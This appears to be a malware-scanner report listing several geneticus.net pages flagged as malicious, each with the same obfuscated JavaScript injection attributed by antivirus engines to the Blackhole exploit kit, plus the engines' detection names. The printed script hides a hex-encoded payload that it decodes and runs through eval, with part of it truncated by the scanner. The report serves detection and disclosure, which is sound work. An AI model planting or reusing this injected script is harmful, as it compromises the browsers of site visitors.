Malicious code - confirmed by antiviruses (see below) itpb="y";qgevx="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[qgevx].getElementById("asd"))}()}catch(odhl){hpcj=function(wgj){wgj="fro"+wgj;for(qbwcnl=0;qbwcnl<itpb.length;qbwcnl++){ewmcr+=String[wgj](bqd(anqe+(itpb[qbwcnl]))-(40));}};};bqd=(window.eval);anqe="0x";kgfi=0;if(!kgfi){try{++bqd(qgevx)["\x62o"+"d"+itpb]}catch(odhl){jnu="^";}itpb="48^8e^9d^96^8b^9c^91^97^96^48^9b^9b^96^58^61^50^51^48^a3^35^32^48^9e^89^9a^48^9b^9c^89^9c^91^8b^65^4f^89^92^89^a0^4f^63^35^32
... 3641 bytes are skipped ...0^48^94^8d^96^54^48^8d^96^8c^48^51^48^51^63^35^32^a5^35^32^91^8e^48^50^96^89^9e^91^8f^89^9c^97^9a^56^8b^97^97^93^91^8d^6d^96^89^8a^94^8d^8c^51^35^32^a3^35^32^91^8e^50^6f^8d^9c^6b^97^97^93^91^8d^50^4f^9e^91^9b^91^9c^8d^8c^87^9d^99^4f^51^65^65^5d^5d^51^a3^a5^8d^94^9b^8d^a3^7b^8d^9c^6b^97^97^93^91^8d^50^4f^9e^91^9b^91^9c^8d^8c^87^9d^99^4f^54^48^4f^5d^5d^4f^54^48^4f^59^4f^54^48^4f^57^4f^51^63^35^32^35^32^9b^9b^96^58^61^50^51^63^35^32^a5^35^32^a5".split(jnu);ewmcr="";hpcj("mCharCode");bqd(""+ewmcr);}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1230
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://geneticus.net/slinks/../slinks/../slinks/../slinks/../slinks/../slinks/../index.html | 200 OK Content-Length: 14631 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) itpb="y";qgevx="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[qgevx].getElementById("asd"))}()}catch(odhl){hpcj=function(wgj){wgj="fro"+wgj;for(qbwcnl=0;qbwcnl<itpb.length;qbwcnl++){ewmcr+=String[wgj](bqd(anqe+(itpb[qbwcnl]))-(40));}};};bqd=(window.eval);anqe="0x";kgfi=0;if(!kgfi){try{++bqd(qgevx)["\x62o"+"d"+itpb]}catch(odhl){jnu="^";}itpb="48^8e^9d^96^8b^9c^91^97^96^48^9b^9b^96^58^61^50^51^48^a3^35^32^48^9e^89^9a^48^9b^9c^89^9c^91^8b^65^4f^89^92^89^a0^4f^63^35^32
... 3641 bytes are skipped ...0^48^94^8d^96^54^48^8d^96^8c^48^51^48^51^63^35^32^a5^35^32^91^8e^48^50^96^89^9e^91^8f^89^9c^97^9a^56^8b^97^97^93^91^8d^6d^96^89^8a^94^8d^8c^51^35^32^a3^35^32^91^8e^50^6f^8d^9c^6b^97^97^93^91^8d^50^4f^9e^91^9b^91^9c^8d^8c^87^9d^99^4f^51^65^65^5d^5d^51^a3^a5^8d^94^9b^8d^a3^7b^8d^9c^6b^97^97^93^91^8d^50^4f^9e^91^9b^91^9c^8d^8c^87^9d^99^4f^54^48^4f^5d^5d^4f^54^48^4f^59^4f^54^48^4f^57^4f^51^63^35^32^35^32^9b^9b^96^58^61^50^51^63^35^32^a5^35^32^a5".split(jnu);ewmcr="";hpcj("mCharCode");bqd(""+ewmcr);}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1230
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://geneticus.net/slinks/../slinks/../slinks/../slinks/../slinks/../slinks/../slinks/zero1.html | 200 OK Content-Length: 10328 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) itpb="y";qgevx="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[qgevx].getElementById("asd"))}()}catch(odhl){hpcj=function(wgj){wgj="fro"+wgj;for(qbwcnl=0;qbwcnl<itpb.length;qbwcnl++){ewmcr+=String[wgj](bqd(anqe+(itpb[qbwcnl]))-(40));}};};bqd=(window.eval);anqe="0x";kgfi=0;if(!kgfi){try{++bqd(qgevx)["\x62o"+"d"+itpb]}catch(odhl){jnu="^";}itpb="48^8e^9d^96^8b^9c^91^97^96^48^9b^9b^96^58^61^50^51^48^a3^35^32^48^9e^89^9a^48^9b^9c^89^9c^91^8b^65^4f^89^92^89^a0^4f^63^35^32
... 3641 bytes are skipped ...0^48^94^8d^96^54^48^8d^96^8c^48^51^48^51^63^35^32^a5^35^32^91^8e^48^50^96^89^9e^91^8f^89^9c^97^9a^56^8b^97^97^93^91^8d^6d^96^89^8a^94^8d^8c^51^35^32^a3^35^32^91^8e^50^6f^8d^9c^6b^97^97^93^91^8d^50^4f^9e^91^9b^91^9c^8d^8c^87^9d^99^4f^51^65^65^5d^5d^51^a3^a5^8d^94^9b^8d^a3^7b^8d^9c^6b^97^97^93^91^8d^50^4f^9e^91^9b^91^9c^8d^8c^87^9d^99^4f^54^48^4f^5d^5d^4f^54^48^4f^59^4f^54^48^4f^57^4f^51^63^35^32^35^32^9b^9b^96^58^61^50^51^63^35^32^a5^35^32^a5".split(jnu);ewmcr="";hpcj("mCharCode");bqd(""+ewmcr);}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1230
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://geneticus.net/slinks/../slinks/../slinks/../slinks/../slinks/../slinks/../slinks/../index.html | 200 OK Content-Length: 14631 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) itpb="y";qgevx="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[qgevx].getElementById("asd"))}()}catch(odhl){hpcj=function(wgj){wgj="fro"+wgj;for(qbwcnl=0;qbwcnl<itpb.length;qbwcnl++){ewmcr+=String[wgj](bqd(anqe+(itpb[qbwcnl]))-(40));}};};bqd=(window.eval);anqe="0x";kgfi=0;if(!kgfi){try{++bqd(qgevx)["\x62o"+"d"+itpb]}catch(odhl){jnu="^";}itpb="48^8e^9d^96^8b^9c^91^97^96^48^9b^9b^96^58^61^50^51^48^a3^35^32^48^9e^89^9a^48^9b^9c^89^9c^91^8b^65^4f^89^92^89^a0^4f^63^35^32
... 3641 bytes are skipped ...0^48^94^8d^96^54^48^8d^96^8c^48^51^48^51^63^35^32^a5^35^32^91^8e^48^50^96^89^9e^91^8f^89^9c^97^9a^56^8b^97^97^93^91^8d^6d^96^89^8a^94^8d^8c^51^35^32^a3^35^32^91^8e^50^6f^8d^9c^6b^97^97^93^91^8d^50^4f^9e^91^9b^91^9c^8d^8c^87^9d^99^4f^51^65^65^5d^5d^51^a3^a5^8d^94^9b^8d^a3^7b^8d^9c^6b^97^97^93^91^8d^50^4f^9e^91^9b^91^9c^8d^8c^87^9d^99^4f^54^48^4f^5d^5d^4f^54^48^4f^59^4f^54^48^4f^57^4f^51^63^35^32^35^32^9b^9b^96^58^61^50^51^63^35^32^a5^35^32^a5".split(jnu);ewmcr="";hpcj("mCharCode");bqd(""+ewmcr);}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1230
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|